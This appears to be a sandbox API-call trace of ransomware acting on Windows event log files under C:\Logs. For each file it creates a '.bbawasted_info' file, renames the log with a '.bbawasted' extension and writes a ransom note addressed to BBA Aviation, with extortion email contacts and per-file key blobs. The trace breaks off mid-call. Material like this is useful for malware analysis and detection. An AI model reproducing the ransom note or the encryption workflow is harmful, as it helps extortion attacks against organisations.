[0189.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0189.886] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0189.886] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0189.886] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0189.886] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0189.887] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0189.889] SetEndOfFile (hFile=0x28c) returned 1 [0189.890] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0189.890] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0189.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.bbawasted")) returned 1 [0190.084] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0190.084] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0190.085] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0190.085] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0190.085] CloseHandle (hObject=0x280) returned 1 [0190.091] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0190.092] CloseHandle (hObject=0x294) returned 1 [0190.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0190.092] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0190.093] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0190.093] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0190.093] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0190.094] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0190.094] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0190.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0190.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0190.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.105] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GW6Jv2CrSegoX4fDCW38YWB1ScBf2w4ewu1y0eRGP0ikXrN/e5sty+ZKdgG3nGg3\r\nzmEkhGNaKtz+qyd2q4osDXROBJVfUbjk70ietCBkU6dhWr3hia/symtPwJdzC8aB\r\nAMajsAGqJ1Ceg0vNm2yzu9ftnbEN4DmWkSpJrMobeUz3Y42ybZ9xaSGiH738Wrl7\r\nVAimHVYwSD8FI92w38fAj7CRQtGmsdzUH/qTVD6kL6OawU0X3v7yqcaQfJ0cuA7y\r\ncOPTS+VUog/pBHAaNpTYmDzN0Q5l5R1WhV4ZOZG4AoPlxgswLcZ0m4DpDOLRWmIa\r\nsOolWxPo8au072upcQQ7k2lWw0zCk7d7WNLIFlv0e738I8c5k39cSVQq4MGw2te5\r\nqb9VNGyRfTgeXih9pOov5Zs+1e0aNItGzCD/OXdsV8dLdTrj+cIys/mtzhZR5JLR\r\ndDPwkuHtD837HqCEyEOrX3qCGcrf9c6nOlOaquwE3VNV2uYnZtzXBqEClPXCo63c\r\n3sGTmGiwPgQroFV7SfQ/NhUhGvGtSIt27JjmMp9dSAP7jAvK8dyVdo0nB/cLJXEY\r\nXvP+GIeGAtKImBrk+jVwyNFij0s3r25/6fyhaKrD6clojtmKYL79olCYtPuZ3FLH\r\nVC5lc/5ntdvq+LQ8+8+/+H2HTeIRKGfFLmcQde8LyYM=[end_key]\r\nKEEP IT\r\n") returned 984 [0190.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0190.105] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0190.105] SetEndOfFile (hFile=0x28c) returned 1 [0190.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.108] CloseHandle (hObject=0x28c) returned 1 [0190.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0190.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a96a0 | out: hHeap=0x660000) returned 1 [0190.205] _aulldvrm () returned 0x0 [0190.205] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0190.206] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0190.206] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0190.206] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 61 [0190.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6aecf0 [0190.207] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0190.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.207] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5e88) returned 1 [0190.207] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0190.207] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0190.207] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0190.208] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0190.210] SetEndOfFile (hFile=0x28c) returned 1 [0190.210] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.210] lstrcpyW (in: lpString1=0x6aed6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0190.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.bbawasted")) returned 1 [0190.211] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0190.211] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0190.211] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0190.211] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0190.211] CloseHandle (hObject=0x294) returned 1 [0190.221] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0190.222] CloseHandle (hObject=0x280) returned 1 [0190.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0190.222] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0190.223] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0190.223] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0190.223] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6b48) returned 1 [0190.223] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0190.223] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0190.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.233] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gwYW/p1N2cnKvDWvGgG+c5t+RzcHqSYYFikmTHe/1uXi85o7KuRrZ6pxNBPqpYLv\r\nl5oO9y1Z3HC6gGiYm5T4LvKYTKWG0oZyGKLoByb7aHdBsPz9fct0GewE4TiS+5zE\r\n9Qj++E9gHp/mjazwd7bLrpPL7FT77DAnJDfnSmFIXUbeLo7k4IRelsLVuGaXipvZ\r\n4wrDGXCpavp3eax368zzJhbfxy1ZkMFSE9lNOOsXgy5A/C3AOZLWNz91hUe5G8/l\r\nzaQBWiQiYlj5qgZQw0lEwiQnjIKjfp4Pdwaw/Tx0UqlKEScPkOX2HrAixaenIxOC\r\nGh8hIRaqOuMoOj2COkNGZlZkMxLFTUoeYfOONEYxdrABQDBoePX8h577YU2W5fBp\r\nyjOB6ZvSqzMfZVPzUKxETwMBHFlKfpORyzAelOPZBfMZP0lYJEWxmB6KwyRVkI2z\r\nnseMZx+homk1qWvIEaQR/rKGDcT0PlOkMOYJVkyCeQ2YA7iVRYp1UNEeT+dkivnk\r\n/zLFJSAftm3PeGTUlEH5PHUUtoDwV/BOccMt4Yy7ZfS6ha+s6jiGFw9JfC0hnOEi\r\nX0SwiARntNRyRPFGhqwT0lNNvve2tNRNzzWnA2ffkFVIS8oyqDJJS92nXs+jxmXc\r\nbLdeQnDB9xI5f/4J/7zgfhk44ihJMBS7K0qjfssdrnM=[end_key]\r\nKEEP IT\r\n") returned 984 [0190.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0190.233] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0190.234] SetEndOfFile (hFile=0x28c) returned 1 [0190.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.236] CloseHandle (hObject=0x28c) returned 1 [0190.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0190.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7408 | out: hHeap=0x660000) returned 1 [0190.357] _aulldvrm () returned 0x0 [0190.357] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0190.357] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0190.357] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0190.357] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 60 [0190.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0190.358] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0190.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.358] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0190.358] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0190.359] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0190.359] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0190.359] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0190.361] SetEndOfFile (hFile=0x28c) returned 1 [0190.361] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.361] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0190.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.bbawasted")) returned 1 [0190.457] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0190.458] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0190.458] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x101000 [0190.458] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101000) returned 0x5480000 [0190.458] CloseHandle (hObject=0x280) returned 1 [0190.743] UnmapViewOfFile (lpBaseAddress=0x5480000) returned 1 [0190.755] CloseHandle (hObject=0x294) returned 1 [0190.756] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0190.756] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0190.756] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0190.756] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0190.757] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0190.757] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0190.757] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0190.767] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.767] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rwA+9tWyGcmTWRRudLB1E6nsIRyCMDn/RVm1nuJPu/sc/2ZSivz7T4aByxbsHcBM\r\nx/SofHbUxZ6jBEpu0meLO9SRZSEdzAfv8Cn/IF4uEra5ZpsPTGM8HZs2nTy2MyvV\r\nDDy0L/GTxnFACoEaXr4+FnnlMtRXtuwsMX6n+k9v2dzEF3FHc/dhOJDciBfYB/kP\r\nmSteQCVeS5r8wMVhhu9uOJ+nZJmryZ2QhcT/+t76OHPqz+tZar1tILUwKPIgPz5c\r\nH5LgjIF/8Ab+zxN6VmRdvSMrTjObsWP46sPnKzFSKm7REPYcpsQGQKDRdDx+Og7b\r\nBP2AjjjHMZNqC5nKrwFdcseMtKKWvvvrE6XCYjhUZAeUvPip/NcBTWKZz+q3X6Fr\r\ns7ObMzR0so6Q8bESdajhyRU/QAutfWgPSa1yg4WeZ6an31Q3yIUV+aNZA5OlNwJu\r\ncU6qGcuKMevVc6vEVgtA+s2AkpHDywFvsZzppAGT//rIR5lnvHcfTv2WmpGnq6OA\r\njAtm77BJZ2RGg2RkD8gJpZ7cMblMcRBVYLBpkqfpReC2EiqJ+/Y6ha5sIiF4b8Eo\r\nacPXDdXZIJ9XtOrT6VZ1KyrK4KwarYZzXz3WOfctpHMbzs4FhwTLMvdAVOs571gH\r\nSIIsZNSHnA7ALCk7v0zJOHPQnYlcOiFLuLJnS8L8B0v=[end_key]\r\nKEEP IT\r\n") returned 984 [0190.767] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0190.767] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0190.767] SetEndOfFile (hFile=0x28c) returned 1 [0190.770] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.770] CloseHandle (hObject=0x28c) returned 1 [0190.772] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0190.772] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8260 | out: hHeap=0x660000) returned 1 [0190.772] _aulldvrm () returned 0x0 [0190.772] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0190.773] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0190.773] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0190.773] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 68 [0190.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x292) returned 0x6aecf0 [0190.774] lstrcpyW (in: lpString1=0x6aed78, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0190.774] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0190.774] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a65f8) returned 1 [0190.775] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0190.775] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0190.775] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0190.864] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0190.866] SetEndOfFile (hFile=0x28c) returned 1 [0190.866] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0190.866] lstrcpyW (in: lpString1=0x6aed78, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0190.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.bbawasted")) returned 1 [0190.867] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0190.867] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0190.868] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0190.868] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, 